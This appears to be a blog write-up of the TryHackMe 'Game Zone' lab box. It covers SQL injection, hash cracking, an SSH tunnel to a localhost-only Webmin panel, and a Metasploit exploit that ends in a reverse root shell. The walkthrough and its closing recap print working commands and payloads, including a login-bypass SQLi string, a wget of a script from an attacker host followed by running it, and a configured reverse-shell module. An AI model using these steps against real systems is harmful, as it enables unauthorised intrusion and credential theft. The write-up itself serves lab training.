Game Zone - SQLi and Reverse SSH Tunneling

ToxSec | A TryHackMe box combining SQL injection, password cracking, reverse SSH tunneling, and Metasploit exploitation.

Apr 19, 2024

0x00 TryHackMe CTF - GameZone

This box forces you to think in layers. No single vuln is catastrophic on its own — but chained together, they collapse the whole system.

Sidebar: Why Exploitation Chains Matter

Most real compromises don’t hinge on one “drop everything” vulnerability. They’re built on chains:

A weak SQLi leak might look minor.
A cracked password alone might look boring.
A local-only service doesn’t seem relevant from the outside.

But if you can connect the dots, suddenly you’re root.

For bug bounty hunters, this is where payouts come from: not the flashy single bug, but the carefully chained report that shows real impact.

0x01 Initial Enumeration

Started with a deep scan — services, versions, and scripts:

nmap -sC -sV -A 10.10.238.97

Results:

22/tcp  open  ssh
80/tcp  open  http   Apache httpd

Two ports doesn’t look like much, but port 80 meant the first move was obvious: check the web.

Web Enumeration

Kicked off Gobuster:

gobuster dir --url http://10.10.238.97 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found:

/index

Navigated there — a login page.

First SQLi Probe

Dropped in a test payload:

Username: admin' OR 1=1-- -
Password: anything

The response changed. Looked like a bypass.

Captured the request in Burp, saved it as web_req.txt, and threw it to SQLMap:

sqlmap -r web_req.txt --dbms=mysql --dump

Result: dumped database entries, including a password hash. That was the foothold we needed.

Sidebar: Manual SQLi vs. SQLMap

Automation is powerful, but it’s no substitute for intuition.

Manual probes (' OR 1=1-- -) are quick and confirm injection.
SQLMap shines when you need structured extraction (dumping DBs, enumerating tables).
Knowing why SQLMap is pulling data makes you a hunter. Running it blind makes you a script jockey.

Takeaway: Always start with manual tests to confirm behavior, then let SQLMap handle the heavy lifting.

0x02 Exploitation: SSH Access

SQLMap gave us a dump that included a password hash tied to a valid user. Time to weaponize it.

Identifying the Hash

Saved the dump and ran it through hashid:

hashid dumped_hash.txt

Output confirmed the format (in this case, MD5).

Cracking with John

Converted it if needed, then cracked with John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt dumped_hash.txt

Result:

<user>:<cleartext_password>

Credentials in hand, I pivoted to SSH:

ssh user@10.10.238.97

Access granted. First flag secured:

cat user.txt

We now had a stable foothold as a system user. Next step: post-exploitation recon to look for privilege escalation paths.

Sidebar: Hash Cracking & Credential Reuse

Hash dumps are rarely the end of the story — they’re the start.

Hash cracking: Tools like John or Hashcat make short work of weakly hashed passwords. With modern GPUs, even MD5/SHA1 still fall in seconds against rockyou.txt.
Credential reuse: Developers and admins reuse creds across apps. A hash from one service often unlocks SSH, RDP, or internal dashboards.
Chaining value: Even if the hash isn’t cracked, reporting its exposure is valuable in a bounty. But if you do crack it, the impact escalates instantly.

Hunter takeaway: Always attempt to crack dumped hashes. Even “low-severity” SQLi becomes critical if it hands you valid credentials for lateral movement.

0x03 Post-Exploitation: Local Enumeration → Tunneling

With a user shell, the next step was to map the local system. Dropped LinPEAS for a quick sweep:

python3 -m http.server 5555   # attacker box
wget http://<attacker-ip>:5555/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Local Service Discovery

LinPEAS flagged a service listening only on localhost:

127.0.0.1:10000

That’s invisible to an external Nmap, but from inside, it’s fair game. Browsing locally showed it was Webmin, a web-based admin tool.

Pivot with SSH Tunneling

To access it from my attacker machine, I set up port forwarding:

ssh -L 10000:127.0.0.1:10000 user@10.10.238.97

Now visiting

http://127.0.0.1:10000

on my local browser revealed the Webmin login panel.

Tried the same credentials I cracked earlier — they worked. I was in Webmin.

Sidebar: Tunneling — The Silent Superpower

Many hackers underestimate tunneling, but it’s one of the most powerful skills in real ops.

What it is: Re-routing internal-only services (localhost or intranet) through a compromised host so you can access them externally.
Why it matters: Companies often assume “if it’s only bound to 127.0.0.1, it’s safe.” But once you have a shell inside, it’s exposed.
How it pays off:
- Hidden admin panels (like Webmin here).
- Dev/staging servers.
- Database consoles.
- Internal APIs.

Hunter takeaway: Always enumerate local ports with netstat, ss, or LinPEAS. Then practice SSH tunneling (-L, -R, -D). It’s a game-changer for both CTFs and real-world engagements.

0x04 Privilege Escalation: Webmin RCE

Once inside Webmin, I checked the version in the UI: 1.580. That’s old — and vulnerable.

Finding an Exploit

Quick lookup:

searchsploit webmin 1.580

Found:

Webmin 1.580 - '/file/show.cgi' Remote Command Execution

That mapped directly to a Metasploit module.

Launching Metasploit

msfconsole
search webmin_show_cgi_exec
use exploit/linux/http/webmin_show_cgi_exec

Configured the module:

set RHOST 127.0.0.1
set RPORT 10000
set USERNAME user
set PASSWORD <cracked_password>
set SSL false
set PAYLOAD cmd/unix/reverse
set LHOST tun1
set LPORT 4444
run

The callback hit. Shell popped as root.

whoami
root
cat /root/root.txt

Box owned.

Sidebar: Metasploit as a Scalpel, Not a Crutch

Metasploit is powerful, but relying on it blindly builds bad habits. The right way to use it is like a scalpel: precise, contextual, and after you understand the vuln.

Good usage:
- You’ve confirmed the service, version, and vulnerability manually.
- You know what the exploit does (RCE via /file/show.cgi).
- You could replicate it by hand if needed.
Bad usage:
- Spraying random modules until something lands.
- Using it without understanding the misconfig or vuln it’s exploiting.

In Game Zone, the exploit worked because we did the groundwork: found Webmin, tunneled it, authenticated with cracked creds, verified the version. Metasploit just saved time on the RCE delivery.

Takeaway: Use Metasploit as a time-saver, not a thinking-saver.

0x5 Debrief + Command Recap

Game Zone is the kind of box that feels less like a CTF and more like a case study in real-world exploitation. No single step was devastating on its own:

SQLi got us a hash.
Hash cracking gave SSH.
Local enumeration exposed Webmin.
Tunneling brought it to us.
Metasploit sealed it with RCE.

But chained together, they made root inevitable.

This is the kind of workflow OSCP drills into you and the kind of reporting bug bounty programs reward: showing how small issues connect into a full compromise.

Command Recap

# Recon
nmap -sC -sV -A 10.10.238.97
gobuster dir --url http://10.10.238.97 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# SQLi
# Manual probe first, then:
sqlmap -r web_req.txt --dbms=mysql --dump

# Cracking
john dump.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Access
ssh user@10.10.238.97
cat user.txt

# Post-Ex
python3 -m http.server 5555   # attacker box
wget http://<attacker-ip>:5555/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

# Tunneling
ssh -L 10000:127.0.0.1:10000 user@10.10.238.97

# Webmin Exploit (Metasploit)
msfconsole
use exploit/linux/http/webmin_show_cgi_exec
set RHOST 127.0.0.1
set RPORT 10000
set USERNAME user
set PASSWORD <cracked_password>
set LHOST tun1
set LPORT 4444
run

# Root
whoami
root
cat /root/root.txt

Sidebar: Chains Over CVEs

It’s easy to obsess over the “next CVE” in bounty hunting. But most compromises come from chains:

A medium SQLi leaks creds.
A weak hash falls to John.
An internal panel hides behind localhost.
A dated service runs unpatched.

Individually, each of those is “meh.” Together, they’re catastrophic.

Takeaway: Don’t dismiss medium-severity bugs. Always ask what can this connect to? Chains win bounties and pentests alike.

Visit here if you’d like to see the guide on improve your bug bounty reporting skills.